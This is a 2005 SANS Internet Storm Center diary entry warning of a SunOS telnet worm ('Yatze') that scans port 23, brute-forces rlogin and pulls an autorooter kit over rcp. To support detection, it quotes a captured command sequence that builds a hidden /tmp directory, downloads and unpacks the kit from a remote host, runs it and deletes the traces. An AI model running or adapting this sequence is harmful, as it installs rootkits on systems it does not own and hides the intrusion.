Threat Level: green Handler on Duty: Brad Duncan

SANS ISC InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Yatze telnet worm; InfoCon update; rlogin link to telnet maybe?

Published: 2005-03-26
Last Updated: 2005-03-26 21:30:18 UTC
by donald smith (Version: 1)
0 comment(s)
SunOS telnet worm on the loose Watch ports 23, 513 and 514

The telnet port(23) is being targeted and rcp is the download port(514)

used to grab the worm/autorooter kit via rcp.

We have received several reports of what appears to be a telnet negotiation
exploit with autorooter or worm like qualities.

Further reports shows many of the hosts being reported for telnet scans

are also being reported for a rlogin bruteforce on port 513

It was reported that the probes for port 23 began on 03/20/2005

Looking at shows 23 has been fairly active but the

number of targets had a large increase on 03/23/2005.

I pulled these commands from a user provide tcpdump file :

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@`/usr/bin/uname -m`.tar . >

echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>

echo cd rk \; /bin/sh go >>

echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>

/usr/bin/nohup /bin/sh >/dev/null 2>/dev/null &
We have not gotten a copy of the actual worm/autorooter yet

If you have a copy we would like to analysis it
I looked at most of the port 23 "violators"

are also showing up for attempting to bruteforce guess the password

on port 513 (rlogin).

InfoCon Alert Status Calibration

We have received a lot of emails about our InfoCon Alert Status

since yesterdays diary requested your feedback/opinions of it.

We will review them and consider each suggestion.

Please keep submitting in your ideas via the contact page.
0 comment(s)
Diary Archives